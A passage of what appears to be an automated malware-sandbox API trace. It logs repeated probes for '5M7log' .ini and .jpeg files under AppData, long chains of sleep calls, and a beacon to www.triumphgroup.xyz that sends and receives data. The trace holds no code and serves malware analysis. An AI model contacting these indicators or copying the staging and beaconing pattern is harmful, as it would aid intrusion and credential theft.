RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.283] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6ce00) returned 1 [0207.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.283] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.283] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0207.283] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bed0) returned 1 [0207.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0207.284] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0207.284] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0207.284] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c590) returned 1 [0207.284] Sleep (dwMilliseconds=0x7d0) [0207.295] Sleep (dwMilliseconds=0x7d0) [0207.296] Sleep (dwMilliseconds=0x7d0) [0207.298] Sleep (dwMilliseconds=0x7d0) [0207.299] Sleep (dwMilliseconds=0x7d0) [0207.302] Sleep (dwMilliseconds=0x7d0) [0207.303] Sleep (dwMilliseconds=0x7d0) [0207.305] Sleep (dwMilliseconds=0x7d0) [0207.306] Sleep (dwMilliseconds=0x7d0) [0207.308] Sleep (dwMilliseconds=0x7d0) [0207.309] Sleep (dwMilliseconds=0x7d0) [0207.311] Sleep (dwMilliseconds=0x7d0) [0207.312] Sleep (dwMilliseconds=0x7d0) [0207.314] Sleep (dwMilliseconds=0x7d0) [0207.315] Sleep (dwMilliseconds=0x7d0) [0207.317] Sleep (dwMilliseconds=0x7d0) [0207.318] Sleep (dwMilliseconds=0x7d0) [0207.320] Sleep (dwMilliseconds=0x7d0) [0207.321] Sleep (dwMilliseconds=0x7d0) [0207.323] Sleep (dwMilliseconds=0x7d0) [0207.324] Sleep (dwMilliseconds=0x7d0) [0207.327] Sleep (dwMilliseconds=0x7d0) [0207.328] Sleep (dwMilliseconds=0x7d0) [0207.330] Sleep (dwMilliseconds=0x7d0) [0207.331] Sleep (dwMilliseconds=0x7d0) [0207.333] Sleep (dwMilliseconds=0x7d0) [0207.334] Sleep (dwMilliseconds=0x7d0) [0207.336] Sleep (dwMilliseconds=0x7d0) [0207.337] Sleep (dwMilliseconds=0x7d0) [0207.339] Sleep (dwMilliseconds=0x7d0) [0207.340] Sleep (dwMilliseconds=0x7d0) [0207.342] Sleep (dwMilliseconds=0x7d0) [0207.344] Sleep (dwMilliseconds=0x7d0) [0207.345] Sleep (dwMilliseconds=0x7d0) [0207.348] Sleep (dwMilliseconds=0x7d0) [0207.350] Sleep (dwMilliseconds=0x7d0) [0207.351] Sleep (dwMilliseconds=0x7d0) [0207.353] Sleep (dwMilliseconds=0x7d0) [0207.354] Sleep (dwMilliseconds=0x7d0) [0207.356] Sleep (dwMilliseconds=0x7d0) [0207.357] Sleep (dwMilliseconds=0x7d0) [0207.359] Sleep (dwMilliseconds=0x7d0) [0207.360] Sleep (dwMilliseconds=0x7d0) [0207.362] Sleep (dwMilliseconds=0x7d0) [0207.363] Sleep (dwMilliseconds=0x7d0) [0207.365] Sleep (dwMilliseconds=0x7d0) [0207.366] Sleep (dwMilliseconds=0x7d0) [0207.368] Sleep (dwMilliseconds=0x7d0) [0207.369] Sleep (dwMilliseconds=0x7d0) [0207.372] Sleep (dwMilliseconds=0x7d0) [0207.373] Sleep (dwMilliseconds=0x7d0) [0207.375] Sleep (dwMilliseconds=0x7d0) [0207.376] Sleep (dwMilliseconds=0x7d0) [0207.378] Sleep (dwMilliseconds=0x7d0) [0207.379] Sleep (dwMilliseconds=0x7d0) [0207.381] Sleep (dwMilliseconds=0x7d0) [0207.382] Sleep (dwMilliseconds=0x7d0) [0207.384] Sleep (dwMilliseconds=0x7d0) [0207.385] Sleep (dwMilliseconds=0x7d0) [0207.387] Sleep (dwMilliseconds=0x7d0) [0207.388] Sleep (dwMilliseconds=0x7d0) [0207.390] Sleep (dwMilliseconds=0x7d0) [0207.391] Sleep (dwMilliseconds=0x7d0) [0207.393] Sleep (dwMilliseconds=0x7d0) [0207.395] Sleep (dwMilliseconds=0x7d0) [0207.396] Sleep (dwMilliseconds=0x7d0) [0207.398] Sleep (dwMilliseconds=0x7d0) [0207.400] Sleep (dwMilliseconds=0x7d0) [0207.402] Sleep (dwMilliseconds=0x7d0) [0207.404] Sleep (dwMilliseconds=0x7d0) [0207.405] Sleep (dwMilliseconds=0x7d0) [0207.407] Sleep (dwMilliseconds=0x7d0) [0207.408] Sleep (dwMilliseconds=0x7d0) [0207.410] Sleep (dwMilliseconds=0x7d0) [0207.411] Sleep (dwMilliseconds=0x7d0) [0207.413] Sleep (dwMilliseconds=0x7d0) [0207.414] Sleep (dwMilliseconds=0x7d0) [0207.416] Sleep (dwMilliseconds=0x7d0) [0207.419] Sleep (dwMilliseconds=0x7d0) [0207.421] Sleep (dwMilliseconds=0x7d0) [0207.423] Sleep (dwMilliseconds=0x7d0) [0207.424] Sleep (dwMilliseconds=0x7d0) [0207.426] Sleep (dwMilliseconds=0x7d0) [0207.427] Sleep (dwMilliseconds=0x7d0) [0207.429] Sleep (dwMilliseconds=0x7d0) [0207.430] Sleep (dwMilliseconds=0x7d0) [0207.432] Sleep (dwMilliseconds=0x7d0) [0207.433] Sleep (dwMilliseconds=0x7d0) [0207.435] Sleep (dwMilliseconds=0x7d0) [0207.436] Sleep (dwMilliseconds=0x7d0) [0207.438] Sleep (dwMilliseconds=0x7d0) [0207.439] Sleep (dwMilliseconds=0x7d0) [0207.441] Sleep (dwMilliseconds=0x7d0) [0207.442] Sleep (dwMilliseconds=0x7d0) [0207.444] Sleep (dwMilliseconds=0x7d0) [0207.446] Sleep (dwMilliseconds=0x7d0) [0207.447] Sleep (dwMilliseconds=0x7d0) [0207.449] Sleep (dwMilliseconds=0x7d0) [0207.450] Sleep (dwMilliseconds=0x7d0) [0207.452] Sleep (dwMilliseconds=0x7d0) [0207.453] Sleep (dwMilliseconds=0x7d0) [0207.455] Sleep (dwMilliseconds=0x7d0) [0207.456] Sleep (dwMilliseconds=0x7d0) [0207.458] Sleep (dwMilliseconds=0x7d0) [0207.459] Sleep (dwMilliseconds=0x7d0) [0207.461] Sleep (dwMilliseconds=0x7d0) [0207.462] Sleep (dwMilliseconds=0x7d0) [0207.464] Sleep (dwMilliseconds=0x7d0) [0207.465] Sleep (dwMilliseconds=0x7d0) [0207.467] Sleep (dwMilliseconds=0x7d0) [0207.468] Sleep (dwMilliseconds=0x7d0) [0207.470] Sleep (dwMilliseconds=0x7d0) [0207.471] Sleep (dwMilliseconds=0x7d0) [0207.473] Sleep (dwMilliseconds=0x7d0) [0207.475] Sleep (dwMilliseconds=0x7d0) [0207.476] Sleep (dwMilliseconds=0x7d0) [0207.478] Sleep (dwMilliseconds=0x7d0) [0207.479] Sleep (dwMilliseconds=0x7d0) [0207.481] Sleep (dwMilliseconds=0x7d0) [0207.482] Sleep (dwMilliseconds=0x7d0) [0207.484] Sleep (dwMilliseconds=0x7d0) [0207.485] Sleep (dwMilliseconds=0x7d0) [0207.487] Sleep (dwMilliseconds=0x7d0) [0207.489] Sleep (dwMilliseconds=0x7d0) [0207.491] Sleep (dwMilliseconds=0x7d0) [0207.493] Sleep (dwMilliseconds=0x7d0) [0207.494] Sleep (dwMilliseconds=0x7d0) [0207.496] Sleep (dwMilliseconds=0x7d0) [0207.497] Sleep (dwMilliseconds=0x7d0) [0207.499] Sleep (dwMilliseconds=0x7d0) [0207.502] Sleep (dwMilliseconds=0x7d0) [0207.507] Sleep (dwMilliseconds=0x7d0) [0207.508] Sleep (dwMilliseconds=0x7d0) [0207.510] Sleep (dwMilliseconds=0x7d0) [0207.511] Sleep (dwMilliseconds=0x7d0) [0207.513] Sleep (dwMilliseconds=0x7d0) [0207.517] Sleep (dwMilliseconds=0x7d0) [0207.518] Sleep (dwMilliseconds=0x7d0) [0207.520] Sleep (dwMilliseconds=0x7d0) [0207.521] Sleep (dwMilliseconds=0x7d0) [0207.523] Sleep (dwMilliseconds=0x7d0) [0207.524] Sleep (dwMilliseconds=0x7d0) [0207.526] Sleep (dwMilliseconds=0x7d0) [0207.527] Sleep (dwMilliseconds=0x7d0) [0207.529] Sleep (dwMilliseconds=0x7d0) [0207.530] Sleep (dwMilliseconds=0x7d0) [0207.532] Sleep (dwMilliseconds=0x7d0) [0207.533] Sleep (dwMilliseconds=0x7d0) [0207.535] Sleep (dwMilliseconds=0x7d0) [0207.536] Sleep (dwMilliseconds=0x7d0) [0207.541] Sleep (dwMilliseconds=0x7d0) [0207.542] Sleep (dwMilliseconds=0x7d0) [0207.544] Sleep (dwMilliseconds=0x7d0) [0207.545] Sleep (dwMilliseconds=0x7d0) [0207.547] Sleep (dwMilliseconds=0x7d0) [0207.554] Sleep (dwMilliseconds=0x7d0) [0207.555] Sleep (dwMilliseconds=0x7d0) [0207.557] Sleep (dwMilliseconds=0x7d0) [0207.558] Sleep (dwMilliseconds=0x7d0) [0207.562] Sleep (dwMilliseconds=0x7d0) [0207.588] Sleep (dwMilliseconds=0x7d0) [0207.646] Sleep (dwMilliseconds=0x7d0) [0207.708] Sleep (dwMilliseconds=0x7d0) [0207.765] Sleep (dwMilliseconds=0x7d0) [0207.801] Sleep (dwMilliseconds=0x7d0) [0207.823] Sleep (dwMilliseconds=0x7d0) [0207.876] Sleep (dwMilliseconds=0x7d0) [0207.947] Sleep (dwMilliseconds=0x7d0) [0207.995] Sleep (dwMilliseconds=0x7d0) [0208.008] Sleep (dwMilliseconds=0x7d0) [0208.051] socket (af=2, type=1, protocol=6) returned 0x1b08 [0208.051] getaddrinfo (in: pNodeName="www.triumphgroup.xyz", pServiceName="80", pHints=0x9e74eb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e74ee8 | out: ppResult=0x9e74ee8*=0xa05e0d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92e90*(sa_family=2, sin_port=0x50, sin_addr="172.67.210.242"), ai_next=0xa05ef90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f93170*(sa_family=2, sin_port=0x50, sin_addr="104.21.77.185"), ai_next=0x0))) returned 0 [0208.108] connect (s=0x1b08, name=0x9f92e90*(sa_family=2, sin_port=0x50, sin_addr="172.67.210.242"), namelen=16) returned 0 [0208.143] send (s=0x1b08, buf=0x82e10fa*, len=174, flags=0) returned 174 [0208.143] setsockopt (s=0x1b08, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0208.143] recv (in: s=0x1b08, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 776 [0208.206] closesocket (s=0x1b08) returned 0 [0208.207] Sleep (dwMilliseconds=0x7d0) [0208.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.213] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.213] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0208.213] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c590) returned 1 [0208.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.213] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.213] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.213] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6ce90) returned 1 [0208.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.213] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.213] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.213] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6d0d0) returned 1 [0208.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.214] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.214] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6d430) returned 1 [0208.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.214] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.214] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bf60) returned 1 [0208.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.214] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.214] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6c590) returned 1 [0208.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.214] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.214] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bd20) returned 1 [0208.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.214] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.214] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6cbc0) returned 1 [0208.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.214] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.215] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.215] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6d430) returned 1 [0208.215] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.215] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0208.215] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0208.215] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4f6bed0) returned 1 [0208.215] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0208.215] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, 